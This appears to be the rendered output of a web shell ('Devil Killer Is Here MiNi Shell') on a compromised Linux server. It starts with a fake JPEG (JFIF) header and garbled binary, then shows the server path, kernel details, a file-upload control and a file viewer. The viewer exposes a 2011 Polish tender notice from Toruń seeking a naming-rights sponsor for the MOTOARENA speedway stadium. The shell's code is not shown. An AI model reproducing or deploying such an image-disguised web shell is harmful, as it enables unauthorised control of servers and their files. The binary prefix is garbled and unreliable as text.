JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110509/132341-N-2011.html

<p class="kh_header"><b>Toruń: Pozyskanie sponsora dla stadionu żużlowego MOTOARENA TORUŃ im. Mariana Rosego przy ul. Pera Jonsona 7 w Toruniu.</b><br>
<b>Numer ogłoszenia: 132341 - 2011; data zamieszczenia: 09.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Toruń reprezentowana przez Prezydenta Miasta Torunia , ul. Wały gen. Sikorskiego 8, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6118713, faks 056 6118622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> um.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pozyskanie sponsora dla stadionu żużlowego MOTOARENA TORUŃ im. Mariana Rosego przy ul. Pera Jonsona 7 w Toruniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pozyskanie sponsora, który wyasygnuje kwotę nie mniejszą niż 2.000.000,00 zł brutto na rok, w zamian za nabycie praw do nazwy  stadionu żużlowego MOTOARENA TORUŃ im. Mariana Rosego przy ul. Pera Jonssona 7 w Toruniu. 
2.Wykonawca zobowiązuje się w szczególności :
1) zweryfikować potencjalnych sponsorów pod względem zgodności ich wizerunku ze strategią   rozwoju i wizerunku miasta Torunia oraz stadionu żużlowego MOTOARENA TORUŃ;
  2) wyszukać sponsora;
  3) uzgodnić ze Zleceniodawcą strategię prowadzenia negocjacji;
  4) przeprowadzić negocjacje przy udziale Zleceniodawcy;
  5) opracować projekt umowy pomiędzy Gminą Miasta Toruń a sponsorem; 
  6) po wyłonieniu sponsora uzgodnić termin zawarcia umowy sponsoringu na okres 4 lat pomiędzy Gminą a  sponsorem na kwotę zł (netto) (słownie) ;
  6) wykonać na żądanie Sponsora dokumentację związaną ze sponsoringiem
Sponsor tytularny uzyska prawo do wyboru nazwy stadionu, logotypu i elementów identyfikacji wizualnej obiektu (dodanie nazwy firmy, kolejność, formuła w uzgodnieniu ze Zleceniodawcą) z zastrzeżeniem pozostawienia w nowej oficjalnej nazwie wyrażeń: MOTOARENA TORUŃ . 
Szczegółowy zakres praw tytularnych oferowanych przez Gminę potencjalnemu sponsorowi stanowi załącznik nr 3 do SIWZ.- Szczegółowy zakres praw do nazwy stadionu żużlowego MOTOARENA Toruń im. Mariana Rosego  przy ul. Pera Jonssona 7 w Toruniu
1 Opis praw
Poniższy wykaz praw ma na celu pokazanie wszystkich możliwych praw, jakie może pozyskać sponsor. Ostateczna lista praw oraz ich będzie przedmiotem negocjacji.
2. Prawa materialne
Do materialnych praw tytularnych zalicza się prawo do wszystkich ekspozycji treści promujących sponsora, które fizycznie znajdują się wewnątrz i na zewnątrz obiektu (w tym nazwa główna) oraz wokół niego i mogą być traktowane, jako nośniki powierzchni reklamowej.
Oznakowanie na zewnątrz obiektu
Główna nazwa i oznakowanie obiektu
Jest to jedna z dwóch najważniejszych powierzchni dla sponsora na obiekcie ze względu na
największe możliwości ekspozycyjne i prestiż.
Oznakowanie umieszczone zostanie na ścianie lub/oraz na dachu Stadionu na wysokości zapewniającej największą widoczność oznakowania.
Ilość oznakowań i sposób umocowania musi być uzgodniony z osobą odpowiedzialną za projekt obiektu oraz należy potwierdzić czy jest wymagana zgoda odpowiedniego urzędu na umieszczenie oznakowania. Koszty umocowania i obowiązek wystąpienia o niezbędne pozwolenia muszą być uzgodnione pomiędzy właścicielem a sponsorem.
Elektroniczne powierzchnie reklamowe na zewnątrz obiektu
Poza oznakowaniem nazwy sponsor może uzyskać także prawo do określonego czasu reklam wyświetlanych na elektronicznych ekranach i telebimach zainstalowanych przez operatora na zewnątrz obiektu na stałe lub na wydarzenia, z których prawa sponsora tytularnego nie są wykluczone.
Oznakowanie parkingów i bram wjazdowych
Sponsor tytularny może mieć prawo do nazwania wybranymi przez siebie markami      i oznakowania stref lub poziomów parkingowych, a także poszczególnych bram lub wjazdów na obiekt. Możliwe powinno być także udostępnienie miejsca przed obiektem w niezagospodarowanym miejscu na instalację lub tablicę informującą gości, że wchodzą na obiekt sponsorowany przez daną firmę.
Oznakowanie znaków wskazujących drogę dojazdu na obiekt
Właściciel obiektu powinien sprawdzić możliwość umieszczenia tablic kierunkowych przy znakach drogowych przy wjazdach i głównych skrzyżowaniach na terenie miasta. Tablice te pełnić powinny wyłącznie funkcję informacyjną (bez ekspozycji logo sponsora), wskazując drogę dojazdu na obiekt.
Oznakowanie przystanków komunikacji zbiorowej
Dopuszcza się możliwość nazwania najbliższych przystanków komunikacji autobusowej i tramwajowej nazwą Stadionu. Poza efektem promocyjnym dla sponsora i samego Stadionu, będzie to także znaczne udogodnienie dla przyjezdnych kibiców udających się na obiekt. Jest to rozwiązanie bardzo często stosowane za granicą i powoduje zwiększenie identyfikacji mieszkańców z nowym obiektem.
Oznakowanie wewnątrz obiektu
Stałe i/lub elektroniczne powierzchnie reklamowe na arenie głównej
Z powierzchni reklamowych dostępnych na głównej arenie gdzie odbywać się będą wszystkie wydarzenia należy wydzielić powierzchnie w strefie telewizyjnej, które widoczne będą z kamer rejestrujących wydarzenia, oraz powierzchnie w strefie publiczności (widoczne tylko z
trybun).
Nie ulega wątpliwości, że powierzchnie w strefie telewizyjnej należeć mogą do najcenniejszych z punktu widzenia sponsora, a ich każdorazowe zagwarantowanie przez właściciela lub operatora obiektu wpłynie na znaczny wzrost wartości praw tytularnych  Należy jednak pamiętać, że prawa te w przypadku większości wydarzeń (szczególnie sportowych) sprzedawane są przez organizatorów wydarzeń i w większości podlegały będą wyłączeniom z praw.
Najlepszym rozwiązaniem będzie przeznaczenie powierzchni/miejsca reklamowego przeznaczonego na stałe tylko dla sponsora tytularnego i nie podlegającego sprzedaży innym reklamodawcom. Miejsce to powinno znajdować się w strefie telewizyjnej, w połowie długości areny (wysokość środka boiska), lecz poza pierwszym rzędem band reklamowych otaczających plac główny, które sprzedawane są zwykle osobno przez organizatorów wydarzenia. Umieszczając je ponad bandami reklamowymi, a maksymalnie na poziomie pierwszych rzędów trybun, sponsor uzyska pożądany efekt ekspozycji w telewizji, bez potrzeby ekspozycji na bandach reklamowych. Jednak ostateczny efekt promocyjny zależeć będzie od operatorów telewizyjnych i realizatorów transmisji z danego wydarzenia. Istotną kwestią do uzgodnienia z organizatorami danego wydarzenia będzie prawo wyłączności branżowej na reklamę podczas wydarzenia.
Dodatkowym rozwiązaniem może być uzgodnienie z najemcą lub organizatorem wydarzenia
przyznania praw do ekspozycji na bandach reklamowych dla sponsora tytularnego obiektu w
zamian za zmniejszenie ceny najmu Stadionu na dane wydarzenie. Ostateczna decyzja powinna być podejmowana każdorazowo przy zaangażowaniu sponsora tytularnego. Firma sponsorująca powinna mieć zagwarantowaną możliwość reklamy na bandach w strefie telewizyjnej za dodatkową opłatą na rzecz właściciela obiektu lub organizatora wydarzenia, jednocześnie bez konieczności zakupu tej formy reklamy.
Powierzchnia reklamowa w strefie publiczności (widoczna tylko z trybun) powinna zostać wybrana w miejscu, które nie byłoby oferowane innym reklamodawcom, czyli nie wpłynie na
zmniejszenie przychodów z reklam podczas wydarzenia. Ekspozycja ta powinna mieć stały charakter i umożliwiać nietypową formę lub format reklamy, np. w postaci statuetki.
Stałe i/lub elektroniczne powierzchnie reklamowe w pozostałych obszarach Stadionu
Poza areną główną, sponsor powinien mieć możliwość reklamy w innych istotnych obszarach
obiektu jak np. foyer, hall główny, przestrzenie komunikacyjne na każdym piętrze i wewnątrz
wybranych pomieszczeń, np. sala do konferencji prasowych. Jednocześnie warto pamiętać, że
prawa marketingowe do niektórych atrakcyjnych przestrzeni np. gastronomiczne, loże VIP czy sale konferencyjne, mogą być przedmiotem sprzedaży innym podmiotom branżowym.
Otwarta strefa sponsora
Firma sponsorująca obiekt powinna mieć możliwość przygotowania na stałe (poza okresami wyłączenia praw) otwartej strefy sponsora wewnątrz Stadionu, najlepiej w foyer, hallu lub w
innej głównej części komunikacyjnej. W ramach tej strefy sponsor powinien mieć możliwość
wystawienia stoisk firmowych, jako punktów do komunikacji z potencjalnymi klientami, demonstracji produktów/usług (sampling) oraz aktywizacji sprzedaży.
Dostosowanie wykończenia i aranżacja wnętrz
Firma może mieć możliwość wpływu na sposób wykończenia wnętrz zgodnie z charakterem marki sponsora, czyli np. uzgodnić umiejscowienie stałych i elektronicznych powierzchni reklamowych, kolor ścian i dekoracji czy innych elementów wykończenia wnętrz. Ponadto sponsor może być zainteresowany niestandardową formą ekspozycji swojej marki i logo, np. poprzez ustawienie instalacji z logotypem wpasowanej w dekoracje przestrzeni. Kwota za pozyskanie tego prawa nie obejmuje kosztów prac dostosowawczych, które powinny być poniesione przez firmę sponsorującą.

Treści audio na obiekcie
Sponsor powinien mieć prawo do powitania i pożegnania uczestników wydarzenia w formie ogłoszenia audio na obiekcie, poza standardowym czasem reklamowym. Przedmiotem dodatkowych negocjacji może być reklama audio produktów i wydarzeń organizowanych przez sponsora, która wpłynie na zmniejszenie czasu audio możliwego do sprzedaży innym reklamodawcom.
Oznakowanie materiałów drukowanych obiektu
Oznakowanie materiałów promocyjnych
Sponsor powinien mieć zagwarantowane prawo do umieszczenia nazwy firmy na wzorcach wszystkich materiałów drukowanych promujących wydarzenia organizowane na obiekcie, w tym: ulotki, plakaty i postery, billboardy, citylighty i inne formy reklamy outdoorowej. Logotyp obiektu powinien zajmować nieznaczną powierzchnię równą pozostałym organizatorom wydarzenia, poza wydarzeniami objętymi okresem wyłączenia z praw.
Oznakowanie kart wstępu
Nazwa Sponsora powinna również znaleźć się na wzorcach wszystkich kart wstępu na obiekt,
czyli na biletach, karnetach, kartach elektronicznych, przepustkach, akredytacjach itp. Powierzchnia logotypu powinna być proporcjonalna do pozostałych logotypów organizatorów.
Oznakowanie oficjalnych dokumentów
Nazwa Sponsora powinna być umieszczona na wszystkich oficjalnych dokumentach wychodzących z obiektu (papier firmowy operatora obiektu) oraz dotyczących Stadionu jak np. dokumenty dotyczące obiektu przygotowane przez Właściciela Stadionu (UM Toruń). Także wszelkie oznakowanie pracowników obiektu (wizytówki, emblematy, stroje) powinny
zawierać logotyp Stadionu zawierający nazwę sponsora.
3. Prawa niematerialne
Prawa niematerialne obejmują wszystkie korzyści, jakie odniesie sponsor w formie marketingowych zastosowań, pozycjonowania (prestiż), rozpoznawalności marki i obecności
w mediach.
Prawa medialne i publicity
Gwarancją ekspozycji medialnej i publicity jest nałożenie obowiązku na najemców Stadionu na używanie oficjalnej nazwy Stadionu we wszystkich materiałach dotyczących organizowanego wydarzenia lub rekompensatę finansową przewidzianą w umowie za każde pominięcie.
Ekspozycja w telewizji i w radiu
Obejmuje ona przede wszystkim transmisje bezpośrednie wydarzeń sportowych                        i kulturalnych, wokół których wielokrotnie wymieniona zostaje nazwa sponsora, nawet jeśli logotyp Stadionu nie jest rejestrowany. Ponadto we wszystkich relacjach informacyjnych                 i reportażach z wydarzeń rozgrywanych na obiekcie istnieje bardzo duże prawdopodobieństwo pojawienia się nazwy firmy.
Ekspozycja w prasie
Obejmuje ona większość tytułów prasowych ogólnoinformacyjnych (dziennych), regionalnych, sportowych oraz kulturalnych relacjonujących wydarzenia odbywające się na Stadionie. Istnieje zależność, że im ciekawsze wydarzenia organizowane będą na Stadionie, tym większą wartość medialną otrzyma sponsor obiektu. Dodatkowym impulsem do ekspozycji w prasie będzie sam fakt sponsorowania Stadionu w okresie rozpoczęcia współpracy ze względu na innowacyjny charakter takiego rozwiązania w Polsce.
Ekspozycja online
Obejmuje ona portale internetowe relacjonujące wydarzenia sportowe i kulturalne prowadzone przez media, kluby współpracujące ze Stadionem oraz fanów sportowych i muzycznych. 
Dodatkowym źródłem ekspozycji będą reklamy obiektu skierowane do klientów biznesowych o komercyjnych możliwościach korzystania ze Stadionu.
Prawa marketingowe
Prawo do wyboru nazwy, logotypu i elementów Corporate Identity
Poza dodaniem nazwy firmy do Stadionu, sponsor mieć będzie wpływ na ostateczy kształt nazwy (kolejność, formuła) oraz możliwość dodania do oficjalnego logotypu Stadionu elementów nawiązujących do firmy sponsora lub nawet logotyp wybranej marki. Ponadto sponsor pozyskać może prawo do wpływu na pozostałe elementy Corporate Identity (CI), czyli identyfikacji wizualnej obiektu.
Prawo do nazwania Stadionu po raz pierwszy
Bardzo cenną korzyścią jest prawo do nadania pierwszej nazwy Stadionu, dzięki czemu sponsor uzyska bardzo silne i długotrwałe skojarzenie z danym obiektem w świadomości mieszkańców i uczestników wydarzeń. Efekt pierwszej nazwy obiektu dyskontowany jest przez wiele lat, niezależnie od terminu rozwiązania umowy o prawa tytularne, więc należy tą wartość włączyć w wycenę praw.
Wykorzystywanie wizerunku Stadionu w kampaniach sponsora
Sponsor powinien uzyskać prawo do wykorzystywania wizerunku i wizualizacji Stadionu w
kampaniach marketingowych firmy. Będzie to korzystnie wpływało na wzrost wartości jego
praw tytularnych, a także pozwoli firmie zdobyć większy prestiż.
Nazwa i design oficjalnej strony internetowej obiektu
Po pozyskaniu sponsora oficjalna strona internetowa obiektu powinna zostać dostosowana w zakresie nazwy i charakterystycznych elementów graficznych (design) strony. Jej wygląd powinien być zintegrowany z elementami marki sponsora, jeśli będzie to stanowiło wartość dla danej firmy.
Komunikacja online i mobilna z zarejestrowanymi uczestnikami
Możliwość uzyskania dostępu do internetowych i mobilnych kanałów komunikacji z uczestnikami wydarzeń zarejestrowanymi na oficjalnej stronie obiektu. Główne kanały komunikacji to newsletter informacyjny, email reklamowy, przesyłka bezpośrednia, kontakt telefoniczny. Korzystanie z danych osobowych uczestników, którzy wyrazili zgodę na kontakt, powinno odbywać się za pośrednictwem operatora obiektu, nie bezpośrednio przez pracowników firmy sponsora.
Oficjalne konferencje prasowe i oświadczenia
Wszelkie oficjalne komunikaty wydawane pisemnie lub podczas konferencji prasowych przez
właściciela i operatora obiektu powinny zawierać nazwę firmy oraz dodatkowo umożliwiać demonstrację logo sponsora. Ponadto operator i właściciel Stadionu powinien dbać o dobre imię sponsora obiektu, podobnie jak sponsor na zasadzie wzajemności dbać powinien o dobre
imię Stadionu i jego zarządców.
Prawa gospodarza
Stała loża VIP i pełna obsługa (hospitality all inclusive)
Sponsorowi tytularnemu obiektu przysługiwać powinna na stałe, co najmniej jedna loża VIP
oznakowana logotypami firmy. Powinna być ona zarezerwowana na wszystkie wydarzenia organizowane na obiekcie, o ile prawo to nie będzie ulegało wykluczeniu w umowie z najemcą. Sponsor może także mieć możliwość wykorzystywania loży w dniach powszednich
poza wydarzeniami dla potrzeb biznesowych, w uzgodnieniu z operatorem. Ponadto loża ta powinna być objęta pełnym zakresem hospitality, czyli obsługą cateringową, stewardes i innych przywilejów oferowanych gościom na danym wydarzeniu.
Bilety pracownicze
Sponsor powinien mieć możliwość priorytetowej rezerwacji większej puli biletów
przeznaczonych dla pracowników firmy i ich rodzin na wydarzenia masowe i otwarte
organizowane na Stadionie.

Organizacja własnych eventów
Sponsor będzie miał możliwość zorganizowania własnych wydarzeń na obiekcie w terminach nie kolidujących z innymi wydarzeniami oraz przy pokryciu wyłącznie niezbędnych kosztów zmiennych, jakie operator poniesie z powodu wydarzenia.
4. Wycena praw
Na wycenę wartości sponsoringu tytularnego Stadionu składa się kilkadziesiąt różnorodnych praw przysługujących Sponsorowi, które warto rozpatrywać w odpowiednim kontekście biznesowym. Jedno prawo generować może kilka korzyści dla sponsora, tak więc daną wartość biznesową firma może osiągnąć na kilka sposobów. Dlatego negocjując wartość danego prawa warto pamiętać, jakie korzyści generuje ono dla Sponsora.
Wzrost sprzedaży produktów Sponsora
Firma sponsorująca będzie miała możliwość prowadzenia sprzedaży produktów lub usług bezpośrednio na obiekcie w dniach wydarzeń oraz w bezpośrednim sąsiedztwie obiektu. Możliwe jest także wykorzystanie wizerunku Stadionu i organizowanych tam wydarzeń w celu wsparcia sprzedaży sponsora poprzez różnorodne promocje, zniżki i działania lojalnościowe, a nawet na opakowaniach produktów Sponsora.
Zwiększenie rozpoznawalności i świadomości marki Sponsora
Dzięki wszelkim formom oznakowania na zewnątrz i wewnątrz Stadionu Sponsor stale zyskuje na rozpoznawalności nazwy firmy. Silnym impulsem wzrostu rozpoznawalności sponsora jest ekspozycja w mediach wokół wydarzeń rozgrywanych na obiekcie. Nazwa i design oficjalnej strony internetowej Stadionu oraz integracja identyfikacji wizualnej (Corporate Identity) z marką Sponsora mogą być kolejnymi czynnikami pro wzrostowymi.
Bezpośredni kontakt z marką na obiekcie
Poprzez fizyczną obecność marki na obiekcie w postaci stoiska, strefy marki Sponsora ipochodnych form, firma będzie mogła nawiązać bezpośredni kontakt z potencjalnymi Kompleksowa wycena praw do nazwy stadionu MOTOARENA Toruń im. Mariana Rosego klientami oferując swoje usługi lub produkty w niestandardowych formach i miejscu. Wsparciem byłaby na pewno możliwość komunikacji online i mobilnej z uczestnikami wydarzeń. Dodatkowym czynnikiem wzmacniającym kontakt z klientem może być aranżacja i wykończenia wnętrza Stadionu nawiązujące do elementów marki sponsora.
Wzbogacenie prestiżowego wizerunku i wiarygodności sponsora
Dzięki znacznej wartości sponsoringu przekazanej przez Sponsora zyska on prestiż oraz wzmocni wiarygodność swojego wizerunku, jako stabilnego finansowo partnera biznesowego, co w czasie kryzysu gospodarczego czyni tą wartość jeszcze cenniejszą dla firmy.
Wizerunek ten może być wzmacniany poprzez kampanie marketingowe z wykorzystaniem wizerunku Stadionu.
Prawa gospodarza na obiekcie
Wizerunek współgospodarza obiektu może być chętnie podkreślany poprzez organizację własnych wydarzeń sponsora, zapraszania VIP oraz wysokiej jakości obsługę loży zajmowanych przez gości Sponsora..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
3.7. Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia, w takim przypadku złożona oferta
spełniać musi następujące wymagania:
